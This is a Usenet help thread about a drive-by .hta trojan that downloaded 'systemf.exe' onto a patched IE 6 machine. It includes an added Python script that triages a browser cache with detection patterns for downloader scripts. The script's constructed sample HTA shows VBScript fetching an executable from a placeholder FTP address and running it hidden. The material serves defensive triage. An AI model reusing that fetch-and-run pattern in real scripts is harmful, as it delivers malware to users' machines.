Help Needed - New Exploit? Trojan auto-downloaded with latest IE, Norton doesn't recog.

Getter

Earlier tonight, I received the following e-mail (edited IP)

---
Hello,

I have received several SPAM emails promoting your services.
Customer service does not seem to care about my complaints,
I hope you take immediate action against this abusive user.

I've put up a copy of the email with complete headers here:
http://64.252.XXX.XXX/abuse.html

Regards,
Alex
---

The web page in question shows a spam e-mail, but then Norton popped
up two windows; one with an embedded script warning, two with
notification that Trojan.Progent had been found on my machine (in the
Temporary Internet Files folders).

After shutting down, I moved the hard drive over to another machine
and did some checking. There's a .hta file in the Temp. Int. Files
directories that Norton does not recognize, but is clearly a trojan.
It's a VBS that downloads a file "systemf.exe" from an FTP site (the
same one the trojan was hosted on). I found systemf.exe on my
machine, confirming that the script did run.

My MSIE is 6.0.2800.1106 _with_ 822925, the most recent security
patch. Norton does not recognize the .hta file or the downloaded
executable.

As you might imagine, I have no idea how much damage has been done (if
any), or, more importantly, how my machine was hit with this. I could
really use some quick advice. Please follow-up to the group, as I
have no mail right now.
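A triage helper for the situation described in this post (the drive mounted on a second machine, a .hta of unknown content sitting in Temporary Internet Files): walk the cache, flag any .hta whose script both reaches the network and can write or launch a file, and pull out the URLs, executable names and a SHA-256 for the vendor submission. This is example code written for this thread, not the poster's file or any vendor's tool; the sample .hta and the 192.0.2.10 address are constructed for the example, and the download/write steps are deliberately left out of it.

```python
"""Offline triage of a mounted drive's IE cache for script-based .hta downloaders.

Added example for this thread; not the poster's file or any vendor's tool.
The sample .hta below is constructed (192.0.2.10 is a documentation address).
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators that a downloader .hta usually needs. No single one is damning
# (plenty of legitimate HTAs use WScript.Shell); several together are.
INDICATORS = {
    "hta_application": re.compile(r"<hta:application", re.I),
    "script_block": re.compile(r"<script[^>]*(vbscript|jscript)", re.I),
    "shell_object": re.compile(r"CreateObject\s*\(\s*[\"']WScript\.Shell[\"']", re.I),
    "filesystem_object": re.compile(r"CreateObject\s*\(\s*[\"']Scripting\.FileSystemObject[\"']", re.I),
    "network_fetch": re.compile(r"(ftp://|https?://|Microsoft\.XMLHTTP|MSXML2\.XMLHTTP|ADODB\.Stream)", re.I),
    "exec_call": re.compile(r"\.(Run|Exec|ShellExecute)\b", re.I),
}
URL_RE = re.compile(r"(?:ftp|https?)://[^\s\"'<>]+", re.I)
# .com is left out on purpose: it would match every hostname in the file.
EXE_RE = re.compile(r"\b[\w\-]+\.(?:exe|scr|bat|pif)\b", re.I)


def analyze_hta(text):
    """Classify one .hta body and pull out the URLs and executable names it references."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {
        "indicators": hits,
        "urls": sorted(set(URL_RE.findall(text))),
        "dropped_names": sorted(set(EXE_RE.findall(text))),
        # A script that reaches the network and can write or execute a file
        # is the downloader pattern described in the thread.
        "suspicious": ("script_block" in hits and "network_fetch" in hits
                       and ("exec_call" in hits or "filesystem_object" in hits)),
    }


def scan_tree(root):
    """Walk every folder under root (e.g. a mounted Temporary Internet Files tree) for .hta files."""
    findings = []
    for path in Path(root).rglob("*.hta"):
        try:
            data = path.read_bytes()
        except OSError:
            continue
        report = analyze_hta(data.decode("latin-1"))  # never fails, keeps byte offsets
        report["path"] = str(path)
        # The hash goes in the vendor submission; the .hta itself must not be opened in a browser.
        report["sha256"] = hashlib.sha256(data).hexdigest()
        findings.append(report)
    return findings


# Constructed stand-in for the file described in the thread: a hidden HTA whose
# VBScript fetches an executable from an FTP site and launches it. The download
# and write steps are omitted; only the shape matters for triage.
SAMPLE_HTA = """<html><head>
<hta:application id="abuse" windowstate="minimize" showintaskbar="no">
<script language="VBScript">
Set fso = CreateObject("Scripting.FileSystemObject")
Set sh = CreateObject("WScript.Shell")
Set req = CreateObject("Microsoft.XMLHTTP")
req.Open "GET", "ftp://192.0.2.10/systemf.exe", False
' ... response written to disk with ADODB.Stream, omitted ...
sh.Run "systemf.exe", 0, False
</script></head><body></body></html>"""

# A harmless HTA for contrast: uses hta:application but no script at all.
BENIGN_HTA = """<html><head><hta:application id="notes"></head>
<body><h1>Release notes</h1></body></html>"""


def demo():
    """Lay out a fake cache tree (constructed) and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        cache = Path(tmp) / "Temporary Internet Files" / "Content.IE5" / "4XG7QB1M"
        cache.mkdir(parents=True)
        (cache / "abuse[1].hta").write_text(SAMPLE_HTA)
        (cache / "notes[1].hta").write_text(BENIGN_HTA)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo():
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['path']}\n  sha256={f['sha256']}\n  urls={f['urls']} drops={f['dropped_names']}")
```

Run it against the real mount point with `scan_tree(r"E:\Documents and Settings")` (or wherever the cache lands on the second machine) instead of `demo()`; the URLs it extracts tell you which host the second stage came from, and the dropped names tell you what to search the rest of the drive for.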
 
Mal

Getter said:
> Earlier tonight, I received the following e-mail (edited IP)
>
> ---
> Hello,
>
> I have received several SPAM emails promoting your services.
> Customer service does not seem to care about my complaints,
> I hope you take immediate action against this abusive user.
>
> I've put up a copy of the email with complete headers here:
> http://64.252.XXX.XXX/abuse.html
>
> Regards,
> Alex
> ---

I've seen an increase in the use of this type of thing recently.

Basically you access a webpage and IE will try to download a .hta file
(or if you aren't patched it will download and run the .hta file). This
will then either create a new file on the fly and/or download more files
from the net.

MS03-032 (822925) should patch this vulnerability and not allow the
files to run automatically. It will however cause a "File open/save"
window to appear. There has been an advisory from Microsoft about more
similar issues to the ones patched in MS03-032 that they're
investigating, but apparently (perhaps) they aren't being actively used.

Try sending a copy of the files with a brief description to
(e-mail address removed).
 
news-server.houston.rr.com

My system did have that latest IE patch, yet still auto-ran the script which
downloaded the virus/trojan/worm/whatever.

Sent the virus to Symantec/McAfee/Trend Micro, hopefully it'll get a good
once-over and I can find out what damage it caused.

Even following best available security practices, my machine was hit hard
with this thing. Nothing to do now but wait until morning and see if it's
big or not.
 
mzlindyone

> Earlier tonight, I received the following e-mail (edited IP)
>
> ---
> Hello,
>
> I have received several SPAM emails promoting your services.
> Customer service does not seem to care about my complaints,
> I hope you take immediate action against this abusive user.
>
> I've put up a copy of the email with complete headers here:
> http://64.252.XXX.XXX/abuse.html
>
> Regards,
> Alex
> ---
>
> The web page in question shows a spam e-mail, but then Norton popped
> up two windows; one with an embedded script warning, two with
> notification that Trojan.Progent had been found on my machine (in the
> Temporary Internet Files folders).
>
> After shutting down, I moved the hard drive over to another machine
> and did some checking. There's a .hta file in the Temp. Int. Files
> directories that Norton does not recognize, but is clearly a trojan.
> It's a VBS that downloads a file "systemf.exe" from an FTP site (the
> same one the trojan was hosted on). I found systemf.exe on my
> machine, confirming that the script did run.
>
> My MSIE is 6.0.2800.1106 _with_ 822925, the most recent security
> patch. Norton does not recognize the .hta file or the downloaded
> executable.
>
> As you might imagine, I have no idea how much damage has been done (if
> any), or, more importantly, how my machine was hit with this. I could
> really use some quick advice. Please follow-up to the group, as I
> have no mail right now.


http://securityresponse.symantec.com/avcenter/venc/data/trojan.progent.html
should get you started at least

Could we have the entire correct URL please? This is Usenet not AOL.


Carol
 
FromTheRafters

Roy said:
> That link is perfectly correct, complete, and should work with any
> browser.
>
> Did you try it before posting?

With all of those X's, why would anyone expect it to work?

...and no, it doesn't.
 
FromTheRafters

Michael Cecil said:

> Yes, the one mzlindyone was requesting that the OP could post since
> this is usenet not AOL
>
> http://64.252.xxx.xxx/abuse.html

The one that you just posted is the one that mzlindyone provided.

Roy didn't see the irony in his asking if mzlindyone tried the url
he or she provided in the self same post. I wanted to point out
what I thought mzlindyone must have been referring to.
 
FromTheRafters

Roy said:
> Thank you, that's the one *I* was talking about too.
>
> At least two of us round here are still sane.....

Err...but *that* was the one that mzlindyone posted, why would
mzlindyone complain about that one being unusable?

...well...I guess sanity is a relative term...
 
mzlindyone

> Err...but *that* was the one that mzlindyone posted, why would
> mzlindyone complain about that one being unusable?

Quite so.

I hereby promise to take the time in the future to be sure my posts
require no deductive reasoning at all. Ghod forbid anyone should have
to *think*.

Carol
 